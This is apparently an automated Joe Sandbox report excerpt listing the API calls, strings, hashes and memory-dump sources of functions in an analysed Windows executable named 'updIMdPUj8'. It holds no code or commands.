                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED1E8B16483449FDB24DF28C88475BBBE1FF89308F1485ADE8899B342D774E909CB56
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d3859232d18b5a5eb0897d9162f40548959561cd6343c24daa1810590adba64c
                                                                                                                                                                          • Instruction ID: f1694423d5388e50da8418e9966f909de58490c1cf40c10714ead03c78cfa4e8
                                                                                                                                                                          • Opcode Fuzzy Hash: d3859232d18b5a5eb0897d9162f40548959561cd6343c24daa1810590adba64c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE16B755083948FC314CF29D88086ABFF0EF9A300F45095EF9D497392D679EA19DBA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                                                          • Instruction ID: debe270d1e9990dddd28186228ef06353d4ffe0b950ec405b82659818e21cfa2
                                                                                                                                                                          • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C9137B020074A9BDB24EF64DCD1BBB77D5EB50300F2009ADF59A9B282DB74B945C752
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                          • Instruction ID: b54f4d89c0195624dd58c19058febe50e7acadfa12ba8505dd00b01f1b9219a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E8127717043468BDB24DE68D8D1BBD77D4EBA1304F2009FDE98A8B282DF70A9858752
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B2E30E
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                            • Part of subcall function 00B31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B61030,00000200,00B2D928,00000000,?,00000050,00B61030), ref: 00B31DC4
                                                                                                                                                                          • _strlen.LIBCMT ref: 00B2E32F
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00B5E274,?), ref: 00B2E38F
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00B2E3C9
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00B2E3D5
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B2E475
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00B2E4A2
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00B2E4DB
                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00B2E4E3
                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00B2E4EE
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B2E51B
                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00B2E58D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                          • String ID: $%s:$CAPTION$d
                                                                                                                                                                          • API String ID: 2407758923-2512411981
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00B4CB66
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C71E
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C730
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C742
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C754
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C766
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C778
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C78A
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C79C
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7AE
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7C0
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7D2
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7E4
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7F6
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB5B
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB7D
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB92
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB9D
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBBF
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBD2
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBE0
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBEB
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC23
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC2A
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC47
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC5F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B39736
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B397D6
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00B397E5
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B39806
                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B3982D
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                          • API String ID: 1777411235-4209811716
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00B3D6C1
                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00B3D6ED
                                                                                                                                                                            • Part of subcall function 00B31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B2C116,00000000,.exe,?,?,00000800,?,?,?,00B38E3C), ref: 00B31FD1
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B3D709
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B3D720
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00B3D734
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B3D75D
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00B3D764
                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00B3D76D
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                          • String ID: STATIC
                                                                                                                                                                          • API String ID: 3820355801-1882779555
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B49705
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B49711
                                                                                                                                                                          • _free.LIBCMT ref: 00B4971C
                                                                                                                                                                          • _free.LIBCMT ref: 00B49727
                                                                                                                                                                          • _free.LIBCMT ref: 00B49732
                                                                                                                                                                          • _free.LIBCMT ref: 00B4973D
                                                                                                                                                                          • _free.LIBCMT ref: 00B49748
                                                                                                                                                                          • _free.LIBCMT ref: 00B49753
                                                                                                                                                                          • _free.LIBCMT ref: 00B4975E
                                                                                                                                                                          • _free.LIBCMT ref: 00B4976C
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 322700389-393685449
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B26FAA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27013
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27084
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B27AAB
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetLastError.KERNEL32 ref: 00B27AF1
                                                                                                                                                                            • Part of subcall function 00B27A9C: CloseHandle.KERNEL32(?), ref: 00B27B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                          • API String ID: 3122303884-3508440684
                                                                                                                                                                          • Opcode ID: 4c827cba2d0c0b8bccc071f890528561e894f656abfbd57a20e37493dc99b4ba
                                                                                                                                                                          • Instruction ID: a1200b2235c1048b3678196e06e5a6b5e1974d1f92ae93244ff0650ef6acd9cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c827cba2d0c0b8bccc071f890528561e894f656abfbd57a20e37493dc99b4ba
                                                                                                                                                                          • Instruction Fuzzy Hash: CB4106B1D48364AAEF20E774AC82FEE77ECDF05740F0004D5FA4DA6182DA74AA488725
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3B610
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B3B637
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B3B650
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3B661
                                                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 00B3B66A
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B3B67E
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B3B694
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                          • String ID: LICENSEDLG
                                                                                                                                                                          • API String ID: 3214253823-2177901306
                                                                                                                                                                          • Opcode ID: ca78af5c403951258ae98a6065028124be4640c37a77049d98af175c7b71ab29
                                                                                                                                                                          • Instruction ID: 14324f54fa58c5d331df1df22b7344086375966e693834b6a4ae0086e7ee9e0b
                                                                                                                                                                          • Opcode Fuzzy Hash: ca78af5c403951258ae98a6065028124be4640c37a77049d98af175c7b71ab29
                                                                                                                                                                          • Instruction Fuzzy Hash: 7221B132204205BBD6119B75EC4AF3B7BEDEB4AF41F110058F604A70E5DF629A41D735
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,89560082,00000001,00000000,00000000,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FD99
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FE14
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00B3FE1F
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE48
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE52
                                                                                                                                                                          • GetLastError.KERNEL32(80070057,89560082,00000001,00000000,00000000,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FE57
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE6A
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FE80
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE93
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1353541977-0
                                                                                                                                                                          • Opcode ID: 8a18e2e45733be2dc6e58669483319094961ca1a3456ae59c3ca2e921974c59b
                                                                                                                                                                          • Instruction ID: a41f89e3c70897cb63a5f8f8a60bdd69fb617e07b21a85599419ac8eb1607718
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a18e2e45733be2dc6e58669483319094961ca1a3456ae59c3ca2e921974c59b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4141E971E40316ABCB109F64CC45BBFBBE8EB48B51F2442B9F915E72A1DB34990087A5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                          • API String ID: 3519838083-3505469590
                                                                                                                                                                          • Opcode ID: 31a8333fd9b3e27c81762fb7f1a82dcc122a642f4114650fb6899a8ae77fe45e
                                                                                                                                                                          • Instruction ID: 35b997ceea027034ed8a750c909140e606c06a769681be9f146053338d41a20e
                                                                                                                                                                          • Opcode Fuzzy Hash: 31a8333fd9b3e27c81762fb7f1a82dcc122a642f4114650fb6899a8ae77fe45e
                                                                                                                                                                          • Instruction Fuzzy Hash: 57716B71A00629AFDB15DFA4DC95EAFB7F8FF48751B140199E516E72A0CB30AD01CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B29387
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B293AA
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B293C9
                                                                                                                                                                            • Part of subcall function 00B2C29A: _wcslen.LIBCMT ref: 00B2C2A2
                                                                                                                                                                            • Part of subcall function 00B31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B2C116,00000000,.exe,?,?,00000800,?,?,?,00B38E3C), ref: 00B31FD1
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B29465
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B294D4
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B29514
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: rtmp%d
                                                                                                                                                                          • API String ID: 3726343395-3303766350
                                                                                                                                                                          • Opcode ID: eaef10b85e5bc5d26c6ef6dc6da658f1996cff1bcb3d893ecc0f43d7fba54d25
                                                                                                                                                                          • Instruction ID: 864d82b1045e8203ae27cce55c583d96ba62875d137d5415922f353088f33562
                                                                                                                                                                          • Opcode Fuzzy Hash: eaef10b85e5bc5d26c6ef6dc6da658f1996cff1bcb3d893ecc0f43d7fba54d25
                                                                                                                                                                          • Instruction Fuzzy Hash: BE415171900378A6DF21ABA0EC55ADE73FCEF55740F1448E5B64DE3151EA388B898B60
                                                                                                                                                                          APIs
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00B3122E
                                                                                                                                                                            • Part of subcall function 00B2B146: GetVersionExW.KERNEL32(?), ref: 00B2B16B
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00B31251
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00B31263
                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B31274
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31284
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31294
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B312CF
                                                                                                                                                                          • __aullrem.LIBCMT ref: 00B31379
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
